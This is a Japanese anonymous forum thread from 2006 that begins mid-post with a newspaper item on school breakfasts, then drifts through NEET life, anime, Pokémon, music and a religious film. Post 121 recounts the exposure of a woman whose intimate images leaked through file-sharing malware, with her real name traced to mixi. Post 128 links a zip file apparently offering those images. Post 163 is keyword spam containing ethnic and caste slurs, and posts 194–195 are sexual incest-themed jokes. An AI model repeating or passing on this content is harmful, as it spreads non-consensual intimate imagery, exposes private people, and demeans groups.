いる。しかし6月のアンケートの結果で、毎日朝食を食べていない町内の児童が16・5%
と、全国平均15%を上回ったことから、町教委が朝食の重要性を知ってもらおう
と2学期の「ブレイクランチ」試行を決めた。

 対象は2校の全児童375人で、1食60円程度の飲むヨーグルトやビスケット、
果物など10種類を、日替わりで両校同じものを出す。全員の分を用意し、食べるか
どうかと朝食を食べて来たかを毎回1人ずつに聞きながら、朝食の重要性を指導する。
保護者にも啓発、報告し、3学期以降は全児童が家庭で朝食を食べるようになれば
廃止するという。


http://www.kyoto-np.co.jp/article.php?mid=P2006100200140&genre=F1&area=S00


ここまで貧乏って凄いな

110 :どっちの名無しさん?:2006/10/03(火) 00:27:04
それは別に貧富関係無いよ
小学生や中学生はプチダイエットみたいなのとか
学校で便意もよおしたら大変だということでそういう子いっぱいいるよ。特に女の子は。

111 :どっちの名無しさん?:2006/10/03(火) 00:56:28
疲れた。
やっぱ文章書くのは苦手だ。

112 :どっちの名無しさん?:2006/10/03(火) 01:28:19
ああ、一生遊んで暮らしたいなぁ。少なくとも他人に干渉されたくない。
・株ニート
・作家
・教祖様
・隠者
どれが一番現実的かなぁ??まぁ株ニートか教祖様なんだろうけど。
隠者は私有林か無人島が必要だしねぇ。

113 :どっちの名無しさん?:2006/10/03(火) 11:01:18
デイトレーダーって無職でもニートじゃないだろ 税金払ってるから
隠者は海外行けばなれるかも 本当になりたかったら10代〜20代後半まで一生懸命働いて且つ親のスネかじって貯金を2000万ぐらい貯めれば
残りの人生は働かなくても例フィリピンに移住して暮らせそうだが

114 :どっちの名無しさん?:2006/10/03(火) 11:03:48
学校で便意もよおしたら大変ってのは女の子じゃなく男の気がする
男は場所が違うからバレバレだけど女は小をしてるときに一緒にすればいいし
小でも紙を必要とするから、大をおこなったことが見つからない

115 :どっちの名無しさん?:2006/10/03(火) 21:29:03
そうそう、そっちは男の話。男で小学校でソレがばれるのは何としても避けたいよなw


ニートの定義は「無職で就職意欲、学習意欲が無い」だから広義にはそういうのも含むハズ
まぁクリーンな儲けかたではあると思うけどね。アフィリエイトは知らない。
そうか物価の安い国に行けばいいのか。「外こもり」と言うそうで前に何かで見た。
視野に入れておくとしよう。

116 :どっちの名無しさん?:2006/10/03(火) 22:43:04
Dグレ
ttp://www.youtube.com/watch?v=Ad-1co1EMfI
デスノ
ttp://www.youtube.com/watch?v=s_mkXrmJuco
錬金
ttp://www.youtube.com/watch?v=6WnaF4HCHVU
リボーン
ttp://www.youtube.com/watch?v=LS089oeLxio
ttp://www.youtube.com/watch?v=Vyk6fXrGYA4

117 :どっちの名無しさん?:2006/10/03(火) 23:33:44
何か全部おもしろそうだな

118 :どっちの名無しさん?:2006/10/04(水) 00:10:28
アレンきゅんの声はもっと高めで上品な感じを想像してたんだけどワンパクボウズっぽくて萎えた。
デスノ(もうすぐやるな)はもともと小畑の絵が素晴らしいんだし、
ストーリーも原作なぞるだけだったらあんまり意味無いよねぇ。アレンジしてほしい。
錬金はアニメ化だけで射精しそうだしクオリティ*とかどうでもいいが良ければ良いほど良い。
リボーンはよくわかんない。


*書いてて思ったけど、この単語使うのってVIPが流行らせたのに乗っかってるみたいで
気が引けるよねぇ。。。こんなん普通に使う言葉なのに。
というわけで別に乗っかってるわけではないですよ…
まぁホントはこんなこと書くのもバカバカしいし痛々しいのだけれど、
真似っ子だと思われるのも嫌なのでこんなこと書いてます。
同じ理由で一昔前から「想定の範囲内」とかも使えなくて困っているのです。

119 :どっちの名無しさん?:2006/10/04(水) 06:03:18
そういう言葉使うのに気が引けるなら頭に「いわゆる」とか使うといいよ。
いわゆる想定の範囲内ってやつですよ、みたいな。

120 :どっちの名無しさん?:2006/10/04(水) 11:30:19
それだと真似っ子だと思われることが50%ぐらい回避されるな それでもだけど

121 :どっちの名無しさん?:2006/10/04(水) 21:46:55
【洒落タマ】shareでマ○コ画像流出女をmixiでハケーン【ボーボボ再来】
1 :ペンギン:2006/10/04(水) 20:21:34 ID:lNEEZ1jg0●

【事件の概要】
shareでウィルスに感染した香具師が彼女のマンコ画像を流出

流出メールから男と彼女の本名ダダ漏れ

本名で検索したらお二人とも本名でmixi登録

女が入ってるコミュの中には出身高校のコミュが・・・

なんとそのコミュに晒されてる旨を書き込んだアホがいた

もうすぐ同窓会があるらしい   ←今ココ


122 :どっちの名無しさん?:2006/10/04(水) 22:01:20
超絶どうでもいい

123 :どっちの名無しさん?:2006/10/04(水) 22:08:52
ニンテンドーDSが流行ってる ポケモンとか
宇多田の新曲は、NHKのみんなのうた http://www.youtube.com/watch?v=VABWXuy2l50

124 :どっちの名無しさん?:2006/10/04(水) 22:14:47
                    おれは今 ぼくはくまをほんのちょっぴりだが体験した
                  い…いや…体験したというよりはまったく理解を超えていたのだが……
         ,. -‐'''''""¨¨¨ヽ
         (.___,,,... -ァァフ|          あ…ありのまま 今 起こった事を話すぜ!
          |i i|    }! }} //|
         |l、{   j} /,,ィ//|       『>>123を見ていたと
        i|:!ヾ、_ノ/ u {:}//ヘ        思ったらいつのまにか予約していた』
        |リ u' }  ,ノ _,!V,ハ |
       /´fト、_{ル{,ィ'eラ , タ人        な… 何を言ってるのか わからねーと思うが
     /'   ヾ|宀| {´,)⌒`/ |<ヽトiゝ        おれも何をされたのかわからなかった
    ,゙  / )ヽ iLレ  u' | | ヾlトハ〉
     |/_/  ハ !ニ⊇ '/:}  V:::::ヽ        頭がどうにかなりそうだった…
    // 二二二7'T'' /u' __ /:::::::/`ヽ
   /'´r -―一ァ‐゙T´ '"´ /::::/-‐  \    サブリミナルだとか催眠術だとか
   / //   广¨´  /'   /:::::/´ ̄`ヽ ⌒ヽ    そんなチャチなもんじゃあ 断じてねえ
  ノ ' /  ノ:::::`ー-、___/::::://       ヽ  }
_/`丶 /:::::::::::::::::::::::::: ̄`ー-{:::...       イ  もっと恐ろしいものの片鱗を味わったぜ…

125 :どっちの名無しさん?:2006/10/04(水) 22:42:19
そうそうポケモンと言えば(前に言ったかも)
高校3年の11月にポケモンリーグで小学1年生を決勝で破り優勝した佐藤祐希さんがかなり有名↓

      /‐ \ ::::::::::::ヽ    ________
    / 高3  \::::::::::::i  /
   /'''''/――--t――| |  ポケモン真剣勝負に歳の差など無い!!
  (__ノ-◎-◎― .'i,_彡| <
    ヽ (__) ノ    6)   \  小1だろうが容赦しねぇぞ…
      ヽε ノ .ノ / ̄`\、  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
.       ヽ、_i⌒i/, -''~  `ヽ、
    ,.‐'´   i--i        \
    `〈ヽ, -''~T  ヽ、 , -'' ~ `ヽ、
     / ( ̄ T   iヽ、__     \.
  /  ┐ ( ̄T   |   `ヽ、    }
 く    |   ̄ `ヽ、/__        /
/`ヽ、/| ポケモン命  `ヽ、___ノ
  /  |            T
http://www.nintendo.co.jp/n01/n64/software/nus_p_np3j/league/index.html#miyagi

126 :どっちの名無しさん?:2006/10/04(水) 23:03:14
リーマンのゼータ関数の産みの親はオイラーでした。
http://www.toyokeizai.net/online/magazine/story05/index.php?kiji_no=24&page=1
http://www.toyokeizai.net/gazou.php?gazou_and_path=online/magazine/story05/images_data/24_8.jpg

127 :どっちの名無しさん?:2006/10/05(木) 18:38:41
真面目にやっているのっぽいのがなんとも。


ポケモンは一番最初のしかやってません。
友人から借りた銀はフシギダネがチコリータになっているのを見た瞬間やめました。


128 :どっちの名無しさん?:2006/10/06(金) 22:16:56
>>121
http://up.viploader.net/src/viploader50492.zip


これのことだな?

129 :どっちの名無しさん?:2006/10/07(土) 01:42:21
DSって今買える?

130 :どっちの名無しさん?:2006/10/07(土) 01:56:15
472 名前:読者の声 :2006/10/07(土) 01:54:34 ID:Mx1C1XCU
759 名前:読者の声 投稿日:2006/10/06(金) 11:53:43 HCesU9Lz
これ、例のチル新曲?
http://www.geocities.jp/msnrf630/sirusimp3.mp3

箒星よりよっぽどいい

131 :どっちの名無しさん?:2006/10/07(土) 02:00:04
ミスチルしるし

ズームイン
http://www.youtube.com/watch?v=NX5qDayREXE
大サビ
http://124.34.229.58:8083/bbs/102269/img/0038627087.3G2
http://www.geocities.jp/msnrf630/sirusimp3.mp3

132 :どっちの名無しさん?:2006/10/07(土) 18:20:08
なんか本スレで評判悪かったけどいい曲じゃないか。
最近のミスチルはドラムががんばるな。

133 :どっちの名無しさん?:2006/10/07(土) 20:18:51
勝運の方が売れるのではないかな

134 :どっちの名無しさん?:2006/10/08(日) 22:44:44
ってゆうかね
お金がいっぱいあっても働かなくてはいけないの
労働の義務って習ったと思う
今や定年過ぎでも働いている人がいっぱいいる 死ぬまで働き続けるのかなー

135 :どっちの名無しさん?:2006/10/09(月) 03:34:19
義務とかどうでもいいし。。。
扶養家族とか別にいらないから楽に暮らしたい。
野原ひろしみたいのになりたくない

136 :どっちの名無しさん?:2006/10/09(月) 03:40:42
あ、ジョジョのゲームのCMでジョジョラー集めたらしい。
http://www.youtube.com/watch?v=aQ2W-17qi7U&mode=related&search=
http://blackbell.jugem.jp/?eid=178

※参考
http://kajipon.sakura.ne.jp/jojo3.htm

以前から決して付いていけてたわけではないが、やはりこの人達には付いていけない。

137 :どっちの名無しさん?:2006/10/09(月) 03:46:58
公園で食べれる果物とかまとめたページ
http://www.kouen.info/fruits-sansai/fruits-itabashi.html

超超わんさか と
超超超超超超超超超超超超超超超超超超超超超超超超超わんさか は何が違うのだろう

138 :どっちの名無しさん?:2006/10/09(月) 05:15:32
mixi株大暴落で自殺者出るかも
http://www.traders.co.jp/stocks_info/individual_info.asp?TYPE=1&SC=2121&MC=03
今思ったけど2ちゃんの相手が企業だと面白いネ
↑みたいに個人相手じゃ可哀相だし、悪いことは何もしてないよねその人

139 :どっちの名無しさん?:2006/10/09(月) 23:28:23
ちなみに俺はお金なんてどうでもいい 義務という理由で働いてぃる

140 :どっちの名無しさん?:2006/10/09(月) 23:30:56
>>137 タラノメなんて山の中しかとれないし超田舎以外の自然界ではほぼ絶滅じゃないかな
その辺になってる柿ってうまいよ

141 :どっちの名無しさん?:2006/10/10(火) 00:32:57
>>139
そうだね
キミはそういう人だよ

142 :どっちの名無しさん?:2006/10/10(火) 00:36:46
>>140
それって誰かが所有してんじゃないの?

あーあー、こんなん無いかなぁ↓
冷暖房設備、人工呼吸器、点滴付き
超頑丈 ABC兵器(核兵器、生物兵器、化学兵器)さえも完全無効化のカプセルホテル

143 :どっちの名無しさん?:2006/10/10(火) 00:48:15
ボンジュール !
ジェ マペル クマ
コモ サ バ ?

中学の時ゆとり教育(笑)の時間で
「あなたが仕事に求めるものはなんですか?」 ってので
○ 休みが多い 給料が多い
× やりがいがある 人や社会のためになる
と正直に答えた。紙にマルした。
つぎの瞬間に教師が「休みと金を両方選んでるやつはいねぇだろうなー」と言った。そんな記憶が。

144 :どっちの名無しさん?:2006/10/10(火) 01:06:36
世の中の人がみんな>>139みたいな考えだったら社会主義って成功すんだろうなぁ。
でも実際には義務でもないよね。資本主義なんだから。
弱者は負ける。←オレは弱者で敗者でいいや←これこそが怠惰の源泉かもしれない。
ほんっとうに明確に規定されてたら、仕事するかも。
だって「勝つために働く」って、意味わかんない。
「みんなが働かなきゃ社会が回らない」なら、まだやってやろうかとは思う。

145 :どっちの名無しさん?:2006/10/10(火) 01:15:22
ユートピアは完全なる管理社会。
質素で規則的で一糸乱れぬ画一的な社会。
住民の一日のスケジュールは労働・食事・睡眠の時刻などが厳密に決められている。
長時間労働はせず、余った時間を科学や芸術のために使う。
給料もみんな同じ。個々人の立場は男女も含め完全に平等。個性はない。

素晴らしいね。

まぁ実際には怠け者や犯罪者がいるせいで、機能しないんだけどね。

146 :どっちの名無しさん?:2006/10/10(火) 14:40:52
俺もインドネシアのジャングルの奥でひとりただずんでいたいと思う 1年くらい

147 :どっちの名無しさん?:2006/10/10(火) 14:44:41
好きで働いてる奴なんて居ないよ
○ 休みが多い やりがいがある

食べていくだけなら畑や果樹園の食べればいいだけだし

148 :どっちの名無しさん?:2006/10/10(火) 16:41:35
ちなみに男の子は「給料」女の子は「やりがい、自分のスキルを活かせる」を選ぶ傾向があるらしい

149 :どっちの名無しさん?:2006/10/12(木) 02:57:57
あのさ、「幸福の科学」って宗教団体知ってる?昔ブームになったらしいんだけど。
その宗教団体が作った映画「永遠の法」を見に行くことになった。
http://www.eien-movie.jp/movie/index.html
まぁ、ようは布教映画なんだけど、ギャグとしては神レベルらしい。
というのも、宗教モノで舞台が霊界なのに、
霊界怪獣「ビヒモス」と巨大ロボット「エンゼルX-1」が戦ったりするそうだ。
それを信者は泣きながら観るらしい。ちなみに信者は1人20枚のチケ購入義務。
レビューとか見ると「友達に誘われて行ったんですけど〜〜〜世界が変わりました」が多いのが気になるw

150 :どっちの名無しさん?:2006/10/12(木) 03:06:36
一番笑えそうなのは「照魔シアター」
最近では天国でも裁判員制度を導入したのか(?)
閻魔様による裁きから「照魔シアター」による裁きに移行したとのこと。
照魔シアターというのは、生前の行いや、その時何を考えていたかなどが、
先に死んだ親族、知人の前で一生分公開されて、親族ら一人一人が○△×で判定。
それによって天国に行くか地獄に行くかが決まるというもの。

何を考えながらオナニーしてたかが親にバレる時点で地獄だと思うのですが…

151 :どっちの名無しさん?:2006/10/13(金) 22:30:20
たった今母親からその映画のチケットもらった。

152 :どっちの名無しさん?:2006/10/14(土) 21:48:29
僕はこういうのには全く興味無いのですけど一応はっときますね
http://d.hatena.ne.jp/kongari/20060901

153 :どっちの名無しさん?:2006/10/14(土) 22:14:13
俺、ビル清掃やってるんだけど、
この前10人ぐらいの年下っぽい酔っ払い男女(25歳くらいかな)に
通りすがりに「負け組み、フォーーーーーー!!(一同大爆笑)」とかやられたよ・・。
俺マジメに働いてるんだけどな・・・。

154 :どっちの名無しさん?:2006/10/14(土) 22:20:39
栄光なんて欲しくない。普通が一番だね・・・。

155 :どっちの名無しさん?:2006/10/14(土) 22:22:41
いまオークション終了ギリギリに入札するためパソコンの前で見張ってます。

156 :どっちの名無しさん?:2006/10/15(日) 01:51:00
あるある。
>>154
そこすごく同感した。

157 :どっちの名無しさん?:2006/10/15(日) 17:07:18
オレは「あんたに何がわかるんだい?」にグッときた。

永遠の法のチケット
一枚100円、一枚160円、送料手数料合わせて二枚で608円で落札した。
入金確認してから発送とか卑怯すぎるね。

158 :どっちの名無しさん?:2006/10/18(水) 19:59:37
ミスチルのしるし
http://bestyz.com/zboard/zboard.php?id=JPOP&page=1&sn1=&divpage=1&sn=off&ss=on&sc=off&select_arrange=headnum&desc=asc&no=1724&PHPSESSID=fc043c8b4232d73f2c0d7fd42a1bb9ed

売れなさそうと思った

159 :どっちの名無しさん?:2006/10/18(水) 22:55:02
きっと真面目に働いているから負け組なんだよ、彼らの基準では。
ミスチルは掌/くるみ以降いまいち感が強いなあ。それでもやっぱ好きなんだけどね。

160 :どっちの名無しさん?:2006/10/19(木) 01:46:47
「彼ら」も真面目に働いてると思うよ。基準は職種。ちなみに給料高いと基本的に激務。
医者とか金あっても使う暇無いし。商社って営業とかの宴会で
100人とかの前でオニンニン出すらしいな。
正直、他人の局部見て何が面白いのか、なんで契約がとれるのかサッパリわかんないけど
それにはキミらも同意してくれるヨネ。

161 :どっちの名無しさん?:2006/10/19(木) 18:10:21
はいどーぞ
http://owaraineta.blog67.fc2.com/blog-entry-761.html

162 :どっちの名無しさん?:2006/10/20(金) 18:01:09
藤岡琢也死んだ

163 :どっちの名無しさん?:2006/10/21(土) 03:41:22
佐賀県 庁 知事  琵琶湖 汚職 金 ゲッツ 談合 琵琶湖 つぶれそう 個人情報流出 琵琶湖
隠蔽 江頭2:50伝説 「1クールのレギュラーよりも、1回の伝説」 良い 悪い 好き 琵琶湖 地味
談合 内部告発 教育委員会 官官接待 琵琶湖 不正受給 悪質 怠慢 氏ね 死ね 暗い 佐賀県民
琵琶湖 謝罪 生活保護 飲酒運転 公務員 親族の経営する 逮捕 前科 チョン 株 売春 琵琶湖
闇金 職員 わいせつ行為 自殺 市民オンブズマン 琵琶湖 違法 インサイダー取引 援助交際  
県庁 知事 汚職 金 談合 琵琶湖 破綻 銀行 巻き添え 中小企業 失業 琵琶湖 自殺 佐賀県庁
琵琶湖 逮捕 懲戒 職員 モラル 倫理 再発 琵琶湖 黒幕 闇 換金 マネーロンダリング 非人
拉致 ミサイル パチンコ 放置 乳児 中毒 規制 売春 少女 家出 暴力団 教師 流出 エタ
自殺 中学 琵琶湖 抗議 虐待 児童 ネグレクト 琵琶湖 病院 産科 不足 慢性 教育 差別
ミカン 不作 病気 打撃 琵琶湖 BSE 牛肉 陽性 市場 壊滅 教師 中学 高校 琵琶湖 被差別
琵琶湖 ヤクザ 部落 在日 生活保護 琵琶湖 倒産 赤字 琵琶湖 不正発覚 winny どこ?

164 :大阪に首都を!東京人に天罰を!:2006/10/21(土) 12:32:30
ニートヒッキー主婦と嫌韓房もアキバ系もあみオタあゆオタも必読!
【印象】東京キー局の偏向報道を叩く116【操作】
http://makimo.to/2ch/tv8_tvsaloon/1160/1160241406.html
【印象】東京キー局の偏向報道を叩く117【操作】
http://makimo.to/2ch/tv8_tvsaloon/1160/1160578061.html
【印象】東京キー局の偏向報道を叩く118【操作】
http://makimo.to/2ch/tv8_tvsaloon/1160/1160842896.html
【印象】東京キー局の偏向報道を叩く119【操作】
http://tv8.2ch.net/test/read.cgi/tvsaloon/1161063935/

165 :どっちの名無しさん?:2006/10/21(土) 13:21:44
佐賀県にハマが引っ越すらしい。

166 :どっちの名無しさん?:2006/10/21(土) 21:12:41
なんか「佐賀」だけじゃ監視員の検索にかからないらしいぞ?今知ったんだが

● 佐賀県庁
● 佐賀県
● 佐賀県民

の3つだそうです。
グーグルなどとは異なり、
「 佐賀 」 だけでは抽出されない検索エンジンで、
運用監視をしているそうです。

だそうだ。「佐賀」だけじゃ引っかからないからあんまり意味ない。
この情報をコピペで佐賀スレに広めるんだ


167 :どっちの名無しさん?:2006/10/21(土) 21:59:08
監視する佐賀県庁もよくわかんないけど
悪ノリする2ちゃんねらーもよくわからない
お互いに何か意味があるのって感じ

168 :どっちの名無しさん?:2006/10/22(日) 02:21:06
皆様大変申し訳ないのですが佐賀県と無関係なスレッドに佐賀県と書き込まないで頂けないでしょうか?
2ちゃんねる風に申しまして「スレ違い」かと存じます。

何かのウイルスか故意なのか「佐賀」を含むワード、たとえば「佐賀県」、「佐賀県民」、「佐賀県庁」、
「佐賀県警」が関係なく書き込まれている模様です。

佐賀県に対する嫌がらせだとしたら、厳に慎んでいただきたい。ネットでは、ちょっとしたことから
風評被害が発生します。たとえば、過去に「銀行が潰れそうだ」という書き込みを発端として、
取り付け騒ぎが発生したことがあります。また、全く無実の人や会社を陥れるために「あいつは痴漢だ」
とか、「カラ出張をしている」、「あの会社は談合の疑いがある」、「あの議員は選挙違反をしている」、
「あの店では、食中毒騒ぎを起して、営業停止処分を受けている」、「実は、あの人はHIV検査で陽性
だった」、「野菜から高濃度のダイオキシンが検出された」、「魚から基準値を上回る有機水銀や
重金属が検出された」などという無責任な書き込みを行ったために、精神的、経済的、社会的打撃
を被っている個人や会社が存在します。

 また、そうした書き込みを行った方も、通報されれば処罰されるのです。たとえば、ある事件の
犯人の名前や住所を書き込むことがしばしば見受けられます。こうしたことは、少年法により
禁じられております。
手前勝手で申し訳ありません。よろしくお願いいたします。

169 :どっちの名無しさん?:2006/10/22(日) 18:02:28
http://blog30.fc2.com/i/imihu/file/vi4813876237.jpg

170 :どっちの名無しさん?:2006/10/23(月) 13:27:50
不覚にも渤海国

171 :どっちの名無しさん?:2006/11/01(水) 23:35:20
     __,,,、,、,、_             
   /´ / ノノリ `ヽ,            
  / 〃 /        ヽ          
  i   /         リ}        
 |   〉   -‐   '''ー {! 「ソフトバンクって¥0なの〜   
  |   |   ‐ー  くー |  すごーい、明日にでもドコモから    
  ヤヽリ ´゚  ..,r(、_>、 ゚'} ソフトバンクに換えようっと。      
  ヽ_」    :: ト‐=‐ァ'::. ! 社長も格好いいし。」と。これでよし      
   ゝヽ、 ::..`二´'.::ノ  ______     
      r| ` ー--‐f´   |  |.    \  \
   /       \.____|  |.    | ̄ ̄|
  /  \___      |  |.    |__|
  | \      |つ    |  |__./ /
  /     ̄ ̄  | ̄ ̄ ̄ ̄| ̄〔 ̄ ̄〕

172 :どっちの名無しさん?:2006/11/03(金) 11:54:18
働きマンの面白さは異常

173 :どっちの名無しさん?:2006/11/03(金) 12:13:38
保守



ポケモンのつまらなさは異常

174 :どっちの名無しさん?:2006/11/03(金) 13:13:37
買ったんだ?
DSなら年末に出るDQMがかなり面白そう。まぁポケモンのパクリなんだけどね。
あと↓コレ買う
http://www.mile-stone.co.jp/product/sokudoku/sokudoku_top.html
確実に効果無さそうだがネタ用
詐欺の教材と同じ臭いがするが安いので

175 :どっちの名無しさん?:2006/11/03(金) 16:34:58
ポケモンってなにするかわからない
とりあえず初期で強いの教えて欲しい
てか最初、植物でやってその次は猿そして今ペンギンでやってる
猿が異常に強かったんだけど、とりかえしのつかないプレイをしてたんで止めた ペンギンは弱いしつまってる

176 :どっちの名無しさん?:2006/11/03(金) 17:17:30
ダイヤパールは買ってないけど
ポケモンは子供向けだから戦略とかイランよ
(もっともポケモンの大会で優勝したいとかなら別だが)
クリアするだけならタイプの弱点知ってれば絶対負けない
まぁ困ったらポケモン板の攻略スレへ
しかし、Wi-Fiの環境が無いのは損だよな
このトシで一人でイトーヨーカドーでDSしてるわけにいかんし

177 :どっちの名無しさん?:2006/11/03(金) 21:04:50
なんかね
ダイヤしかやってないけど
基本的に最初に手に入るポケモン一匹で、ほぼ全部の敵倒せそう
だけどそれがほぼってことで、やっぱり少なくとももう一匹はいると楽
でもどれを仲間にするかってので、それが分からないw
基本的にどんどん進めばいいだけなんだろうけど。
あとこれ少し記憶力いるよね ここがFF12なんかとちと違う 戦略とかならその場で考えればいいだけだから楽なんだけどw
てかDSは持ってるけど、ダイヤパールは持ってないんだね

178 :どっちの名無しさん?:2006/11/03(金) 22:06:16
ああうん、いろんな理由でね。ホントは布団の中でグダグダできるような
大ボリュームのRPG 生活シュミレーション カードゲームが欲しいんだけど
どうぶつの森→一日にやらなきゃいけないこと大杉、地方者に不利で売った
テイルズ→キャラデザきもすぎ

最近のはわからないけど
ペンギンのタイプは水でしょ。
水の弱点は草と電気
だからこれをカバーする。
草に強いのは炎と虫(虫はラストでまったく使えないので使わないほうがいい)
電気に強いのは地面
だから炎か地面を使えばいいんだけど、地面を使うと、地面は草に弱いから草には両方負けちゃう。
よって炎。序盤で炎はあんまいないけどね

179 :どっちの名無しさん?:2006/11/03(金) 22:17:17
っていうかさっき書いたけど猿が最初にいて確かにそいつ強いんだよなぁ
しかもそいつ炎
でさ確かに弱点とか強点とかあるんだけど
全てをカバーするみたいなのもあって、だから猿だけで出来るんだ
具体的に格闘っていうのかな そういう属性とは違った数式で出来るっていうか
で、やっぱ最初からやり直して猿でやってみるよ ありがとう
てか敵倒すのが面倒なので一匹もしくは二匹以外は育てたくないというかそういう感じです

180 :どっちの名無しさん?:2006/11/03(金) 23:10:23
オレは上からレベル低い順に並べて、レベルが上がったら下へ、って感じで
全員のレベル均等にしてた。そういう作業大好きなんでw
伝統的に最初の3匹で一番強いのは炎。格闘もあるなら間違いなく最強だよ猿。
格闘はノーマルと岩に強くて、エスパーと(たしか)飛行に弱いんだけど、
ノーマルに強いのは格闘だけだから、他に代わりがいない。
wikiで今作に出るポケモン一覧見たけど、ヤドンとプリンがいないのはキツすぎるなぁ

友人によるとオレはポケモンで言うとヤドンらしい
http://images.google.com/images?hl=ja&q=%E3%83%A4%E3%83%89%E3%83%B3
ちなみにオレのイメージではaoiはヒトデマン
http://images.google.com/images?hl=ja&q=%E3%83%92%E3%83%88%E3%83%87%E3%83%9E%E3%83%B3
kyo-はマダツボミです(すいません)
http://images.google.com/images?svnum=10&hl=ja&lr=&q=%E3%83%9E%E3%83%80%E3%83%84%E3%83%9C%E3%83%9F

181 :どっちの名無しさん?:2006/11/04(土) 12:47:52
なるほどな さんくす マダツボミの口おもろいw

182 :どっちの名無しさん?:2006/11/04(土) 15:52:05 ?2BP(0)
テスト

183 :どっちの名無しさん?:2006/11/04(土) 21:54:03
http://www.poke-mon.jp/pokemon/056.html

女の子がマンキーと呼ばれてた。
なんでかっていうと、ぶたざるポケモンだからなんだけど、
女の子にコレはちょっと酷すぎるなぁ

184 :sophie ◆ru9iMUTANc :2006/11/05(日) 18:09:06
http://www.youtube.com/watch?v=U9OfbFgpNjM&mode=related&search=
ようつべって自分をアップする人多いよね

185 :どっちの名無しさん?:2006/11/05(日) 20:39:46 ?2BP(0)
少なくとも帝王ではなく女帝だと思うのだが・・・
サマーパーティはこれの中でもレベル低いほうだなwOFFしてみたい

186 :どっちの名無しさん?:2006/11/05(日) 20:47:47 ?2BP(0)
http://yaplog.jp/love_nagano/
彼氏いるんだな

ようつべのギャグマンガ日和おもしろい 5分でお手軽に見られるのがいい
http://www.youtube.com/results?search_query=%E3%82%AE%E3%83%A3%E3%82%B0%E3%83%9E%E3%83%B3%E3%82%AC

187 :sophie ◆ru9iMUTANc :2006/11/06(月) 16:23:48
そうだよ 彼氏いる 俺も色々検索した

いまようつべできらりんレボリューション全部見てる

188 :どっちの名無しさん?:2006/11/06(月) 19:00:10
なんで??顔の横幅が物凄いことになってるね。そのアニメ
アニメって3分に一度くらいギャグかハラハラドキドキのバトルシーンがないと、かなりキツい。
なにかしらのサプライズが無いのは観ていて疲れる。
オレが映画をつまらなく感じる理由がわかったかもしれない。2時間それなわけだし。

189 :sophie@VEX ◆ru9iMUTANc :2006/11/06(月) 21:06:28
いま女子中学生とかハロプロに興味あるから
てか最近検索系動画系ブックマーク3つ増えた
http://streaming.yahoo.co.jp/ranking/all/
http://animemo.blog5
http://stage6.divx.com/4.fc2.com/


190 :sophie@VEX ◆ru9iMUTANc :2006/11/06(月) 21:20:26


191 :sophie@VEX ◆ru9iMUTANc :2006/11/06(月) 21:25:07
http://stage6.divx.com/

192 :sophie@VEX ◆ru9iMUTANc :2006/11/06(月) 21:29:12
http:// animemo. blog54. fc2. com
これかけない

193 :どっちの名無しさん?:2006/11/07(火) 16:48:42
http://www.youtube.com/watch?v=C8kM-ZAaTOY

194 :どっちの名無しさん?:2006/11/07(火) 22:30:00
妹:「お風呂上がったからはいっていいよー」
兄:「あーい。さてと、、ってげげっ!?お前何つー格好してんだよ!」
妹:「別にいいじゃない。家族なんだし。だって暑いんだもん」
兄:「おまえオッパイが見えそうじゃないか!下なんてパンティ丸見えだぞ!」
妹:「はぁ?なに焦ってんの。。?ばっかみたいおにいちゃん」
兄:「っつーか若い女がそんなかっこで歩き回るとか!早く着替えろ」
妹:「あれー?まさかお兄ちゃん、あたしのハダカみて興奮しちゃったの(笑)?嘘でショー?」
兄:「!!そっそんなことあるわけないだろ。。」
妹:「ふふふ。お兄ちゃん。エッチしたこと無いんでしょ?」
兄:「。。そんなの言えるか!」
妹:「図星だー☆・・ねえ、あたしでよかったら。。。初めての人になってあげてもいいよ」
兄:「ぶっ、ナンスカそれ?どこのエロゲーだよwからかうんじゃねえっての」
妹:「からかってなんかないもん。。”がばっ!”ほら、お兄ちゃんオッパイだよ。
  お兄ちゃんが夢まで見たオッパイ。好きにしていいんだよ。アソコだって。。
兄:「本当にいいのか。。?」
妹:「来て。お兄ちゃん。あたしをめちゃくちゃにして!」
兄:「ジャイ子…」


195 :どっちの名無しさん?:2006/11/08(水) 12:41:31
「お、おにいちゃんやめて・・・
そんなとこ舐めちゃだめえ・・・・・・・・・
そこはおしっこするところなの
きたないよお・・・・・・」

妹は泣きながら言ったが、
僕は便器を舐め続けた

196 :sophie@VEX ◆ru9iMUTANc :2006/11/08(水) 19:34:04
多分滅茶苦茶面白いつもりで書いたんだろうけど
これで(プとか思う人間と思わない人間がイル

197 :どっちの名無しさん?:2006/11/08(水) 20:03:49
いや、195は194に合わせただけなんだけど 喜ぶと思って。
まぁこの2つはそれなりに面白いと思うんだけど、
「アッー!」ってホントに何が面白いのかサッパリわからない。
なんかね、「感性が違う」とか「別に面白くないけど悪ノリしてるだけ」とか
そういう次元の話ではない退屈さな気がすんだよね。
普通なら別に自分が面白くなくても、それで笑ってる人がいることは理解できるんだけど

198 :どっちの名無しさん?:2006/11/09(木) 17:29:08
最近は
      
   / ̄\
  | ^o^ |  
   \_/

こいつがお気に入り。

199 :どっちの名無しさん?:2006/11/10(金) 19:56:32
  ( ゚д゚)
_(__つ/ ̄ ̄ ̄/_
  \/    /
     ̄ ̄ ̄
  ( ゚д゚ )
_(__つ/ ̄ ̄ ̄/_
  \/    /

  ( ゚д゚ ) ガタッ
  .r   ヾ
__|_| / ̄ ̄ ̄/_
  \/    /

 ⊂( ゚д゚ )
   ヽ ⊂ )
   (⌒)| ダッ
   三 `J

これはわりと好きかな

200 :どっちの名無しさん?:2006/11/10(金) 19:59:22
http://aoi.s1.x-beat.com/file/data/page011.jpg

これの中島美嘉怖すぎ
はげてる

201 :どっちの名無しさん?:2006/11/10(金) 23:45:53
194は最後の一言がいいんだろうな。やっぱ。

202 :どっちの名無しさん?:2006/11/11(土) 01:15:04
中島美嘉って本業が女優のはずなのにあまり女優していない気がする。
濱マイクに出ていたのは覚えているんだが。

203 :どっちの名無しさん?:2006/11/12(日) 00:08:53
中島美嘉がミリオンとかを出すような歌手だったって今知った。
全盛期にちょうど(多分)購買層である中高生だったのに、何故だ。

204 :sophie@VEX ◆ru9iMUTANc :2006/11/12(日) 15:06:14
NANA2主題歌
http://www.mikanakashima.com/
中島美嘉の顔怖い 曲がそのまんまグレイ

205 :どっちの名無しさん?:2006/11/12(日) 18:19:03
ほんとだまんまだ。そういう企画って結構好きなんだけどあんま無いね。
もっとカバーアルバムを出すべきだと思う。

206 :どっちの名無しさん?:2006/11/12(日) 18:25:33
